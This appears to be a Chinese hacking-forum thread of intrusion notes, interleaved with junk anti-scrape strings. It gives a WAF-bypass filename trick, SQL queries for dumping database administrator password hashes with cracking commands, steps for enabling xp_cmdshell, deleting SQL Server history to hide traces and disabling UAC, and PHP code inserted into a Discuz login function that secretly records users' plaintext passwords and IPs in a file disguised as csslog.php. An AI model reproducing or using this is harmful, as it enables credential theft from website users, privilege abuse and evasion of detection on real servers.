当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。* X3 S# C0 M* m$ ?! v% Y' T$ g
就是搜索case ‘login’
' I" v- S, _( s# v$ E在它下面直接插入即可,记录的密码生成在pwd.txt中,
' I2 x* A7 s F5 x5 ?4 k) q其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
& ^6 A1 ^6 f& w' u+ }6 l( f利用II6文件解析漏洞绕过安全狗代码:
2 C- M6 X1 L% `;antian365.asp;antian365.jpg' ^2 [( C0 R8 y2 i& [8 N1 D
, } O$ N1 e! T. h" l
各种类型数据库抓HASH破解最高权限密码!
9 B ]7 P0 ~7 \( p5 C$ B1.sql server2000+ s1 w g, j, [& I/ D1 p5 P
SELECT password from master.dbo.sysxlogins where name='sa'
* |# i+ h! R9 f E0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
( s! u$ D3 r! U p: w& m2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
- c0 x. |! Q8 P7 f. x' n
6 \9 u, a7 l; Z$ G2 d4 L8 q2 o* l' I7 _0×0100- constant header
2 @* O6 J& i( j$ S34767D5C- salt
* M- M y8 q% ^& I0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
1 y r, e' c7 C# V% W& A: F2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
; X9 J$ A8 |. O! W- X' v9 kcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
, n) u. \( f: l5 f8 K' I4 pSQL server 2005:-& q& v5 u9 ?1 K2 @6 N" u& k
SELECT password_hash FROM sys.sql_logins where name='sa'
) d$ N: t) w0 B6 `3 }/ u7 {& x0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F1 A8 i( F- Z, x6 p: k! S6 _
0×0100- constant header& `2 n( ~0 [; U& K1 K( U
993BF231-salt! B% j0 n7 t! R4 Z$ l1 l
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash8 S' W- A( R2 h+ T x. Z
crack case sensitive hash in cain, try brute force and dictionary based attacks.
; J5 X, S* \! M; l7 H Y
4 y) |) @1 h/ [5 F( Zupdate:- following bernardo’s comments:-
/ m0 u1 {! W V( h9 _2 Xuse function fn_varbintohexstr() to cast password in a hex string.1 Q; |4 L# ?6 ^ a1 a
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins7 O. y: s7 N1 O0 I3 t
p& U* a! S# I' g, |! l1 R" f( ZMYSQL:-5 F y. Q# f9 j
, t5 K& ^% Y: F' Q( a# U; M6 q- ?
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2., `" `% c( e- d$ }% O
3 L5 p& j V# E0 X# |* Q* ]
*mysql < 4.1) K3 j$ v1 x; q! ]
* t B2 \9 p) A0 j) p2 ~0 Amysql> SELECT PASSWORD(‘mypass’);
7 c' E* ]' j1 i; d8 u+——————–+& m8 [/ [7 V+ q& [
| PASSWORD(‘mypass’) |
3 S y& y6 j7 C! _% r/ m+——————–+
4 p, d0 i8 R" l: s6 C* S$ @0 Q| 6f8c114b58f2ce9e |
! I( Y: `0 ~6 Q4 o u. [, \1 S+——————–+3 K6 I u( Z$ F" j$ |
" m. l% Z( s- O7 g
*mysql >=4.1: a5 D' d/ F3 C* N% |) Q
+ o0 U5 w& x" H+ A2 q' j) Gmysql> SELECT PASSWORD(‘mypass’);5 Y# F- ]4 f; c% i( M
+——————————————-+
6 a' {% w. b. X! \. q" M2 W) q) }# P$ ^| PASSWORD(‘mypass’) |
: U2 p$ _1 n0 R1 z- a& m! J* x, A+——————————————-+0 ]( E, H4 X# @% U7 x1 n
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |& ?. y) \- N- x$ ?- t Y- B
+——————————————-+
V: D y! O; z( z" O& P; S; h
/ ?9 V. I" D1 R7 v9 Z' ?, pSelect user, password from mysql.user& [. v) [6 R% Y i) E
The hashes can be cracked in ‘cain and abel’- U% q4 K! o, s- Z$ l6 k
- |0 [7 K. G( X1 i5 u+ x
Postgres:-6 B& v" D; x, ?. e& c" o$ @
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
0 t. t% c, _% l3 e/ l( n! aselect usename, passwd from pg_shadow;! ]* J( J! x( R3 R
usename | passwd v/ ?) l2 A0 d! Q7 w
——————+————————————-) }) o5 W1 T/ i, [! v1 u0 c# V
testuser | md5fabb6d7172aadfda4753bf0507ed4396! D5 _' }2 C7 S) v4 [, x
use mdcrack to crack these hashes:-
; y- P: q3 {/ C5 r0 b$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396+ ]- e, Y, j/ R. o4 W0 P$ q8 r
5 ]; X0 F$ d1 b+ n" O
Oracle:-8 b) Q% Y, I8 ~; b
select name, password, spare4 from sys.user$& @& \" o2 f1 B
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g- k! c& w2 z i* L' F; n" K
More on Oracle later, i am a bit bored….- [7 B8 a* V7 ?0 t# K6 \6 ^. K7 D
* K/ h" X' t2 {
7 C* z2 R2 i' V3 |5 R1 l6 m1 N在sql server2005/2008中开启xp_cmdshell) }% k6 p6 I c) ~& L+ A7 X, K2 h5 p
-- To allow advanced options to be changed.) g2 O$ f! L2 m; v; S
EXEC sp_configure 'show advanced options', 1" P# ~# x0 w5 c$ F# P( O0 `
GO" m$ W8 L; l7 ?! V, q6 w
-- To update the currently configured value for advanced options.! `6 l& d4 v7 `8 P
RECONFIGURE0 y8 G; X2 z0 M/ F8 y6 V
GO6 v ~, |( \( r
-- To enable the feature.
. d& G$ y1 m0 P8 a r( U, vEXEC sp_configure 'xp_cmdshell', 1
/ z8 b0 R4 Q% k8 Y. GGO
* V# b! ]. W4 z0 Z& F. U-- To update the currently configured value for this feature.
/ O M( E/ S6 r! A' RRECONFIGURE
( c8 Q. S$ v/ u1 f1 \2 \9 U6 @3 FGO& T0 U. t6 F9 J8 W9 I) o! G7 U
SQL 2008 server日志清除,在清楚前一定要备份。; H1 a! S# ?2 e! h( L% Y' y9 e+ N5 I
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:4 f) {$ _: _( `6 y$ K
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin' J- L7 j: h2 p- c
* C3 e4 |* x7 G# z# j9 l对于SQL Server 2008以前的版本:
$ @' J& J# o- ~7 Q+ MSQL Server 2005:' L. \+ H' W5 H, C l2 }3 \# |' z
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
) B! Z& @7 T* s2 _* S$ W8 C7 F) _SQL Server 2000:' J/ T5 a/ z/ P) s: B) T- N) s
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
# c- u8 [6 ^: A& S* N
4 @5 B2 U4 \$ D' t. h% a本帖最后由 simeon 于 2013-1-3 09:51 编辑
8 J% S( ]& E, F' Y7 f( B4 s0 q+ m/ b# p3 y
; V6 ]+ Q- _/ @- }
windows 2008 文件权限修改
* o9 O6 S' d K$ b6 q2 C1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx! ]& W6 @2 Z7 O$ a) s+ R$ d: E% y
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98( E" A' a y! L$ ]4 _
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
$ `9 j# v5 M- d! C$ ?$ l$ D. i' G1 f8 e$ u, E
Windows Registry Editor Version 5.00% q$ c( |3 K; K; [
[HKEY_CLASSES_ROOT\*\shell\runas]) s! l; k1 g9 m9 p4 m
@="管理员取得所有权"
/ Z7 s) K% ^ Q& g' Q# H"NoWorkingDirectory"=""
5 f) h' Q) R% _[HKEY_CLASSES_ROOT\*\shell\runas\command]
% x; S" T( x0 E/ k% W- p@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
) F# [7 T! `. t, j6 N"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& ]: a3 B8 r5 F8 c7 _
[HKEY_CLASSES_ROOT\exefile\shell\runas2]8 o3 i ~& \% `( l5 t
@="管理员取得所有权"
4 Y* E! j8 a& ^- l"NoWorkingDirectory"=""
1 [3 E/ B! x/ m: ~0 e8 D1 y5 D[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]/ X# \% X- q3 F- `
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 a* T+ a4 F( D) C
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"2 \) K' @8 J" G9 l+ b$ e. H3 f
& A1 m$ i& [0 l2 Y |* {+ L5 K
[HKEY_CLASSES_ROOT\Directory\shell\runas]- U: _' }5 R8 P7 z; t* J6 N( W
@="管理员取得所有权"
3 `, W. h! N, |: z- F. @3 _9 @"NoWorkingDirectory"=""
K+ i G- a m[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
# M; O9 E* e% `' k2 T; ~@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
) F; r1 s4 T6 G. Z i( Y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"( X* p+ w6 }& t
; g* Z, K @! N, q8 @( q3 f. n. `
* |& Y( W8 ~# V% W( jwin7右键“管理员取得所有权”.reg导入* K9 `2 |( v- `7 A
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
+ B% D7 i( I9 F, W1、C:\Windows这个路径的“notepad.exe”不需要替换; B v5 A7 X' ]% X/ E
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换1 {- u* ?3 @* y2 w& ?0 H& i
3、四个“notepad.exe.mui”不要管
) `/ y, D! v: u8 {. X. j. W4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
: {* o; _0 b' V) W0 q7 QC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
6 o( E3 @# ]% Q4 p3 Q替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
. M' [4 D) ]: t0 l/ K+ s4 _替换完之后回到桌面,新建一个txt文档打开看看是不是变了。/ v5 ?. v$ V; |# M( T; X
windows 2008中关闭安全策略: 5 H m, t/ | C% {
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
! {1 c" r# R6 s7 V k6 x修改uc_client目录下的client.php 在- F' D5 Q- O( h( [
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {2 F4 K8 F1 [2 U' G) s
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php3 _6 I- ], Q6 A- `& u
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw! ~! M+ A" ?1 m7 Q" d5 U- J: K
if(getenv('HTTP_CLIENT_IP')) {1 z$ F K7 J2 k( T' X. p
$onlineip = getenv('HTTP_CLIENT_IP');" z1 m" ?* u9 d9 J: w! s+ @$ `
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {% L/ g) x7 ~# b5 E1 o
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
' M8 H' K" a# B% o} elseif(getenv('REMOTE_ADDR')) {1 }$ U) I% w8 W5 R( i, d
$onlineip = getenv('REMOTE_ADDR');, v$ @3 A' G8 R& V( z
} else {! n, ^' ^- I2 ^+ |; M5 C
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];+ _6 @2 ?9 P+ d
}3 e/ @$ O3 ]5 s. p
$showtime=date("Y-m-d H:i:s");- \1 `! {7 G- Z' p7 Y' |' S) l) m* N
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
7 r: i4 P: n p% U3 I, [1 H $handle=fopen('./data/cache/csslog.php','a+');
- K2 }8 Z' o9 ^ $write=fwrite($handle,$record); |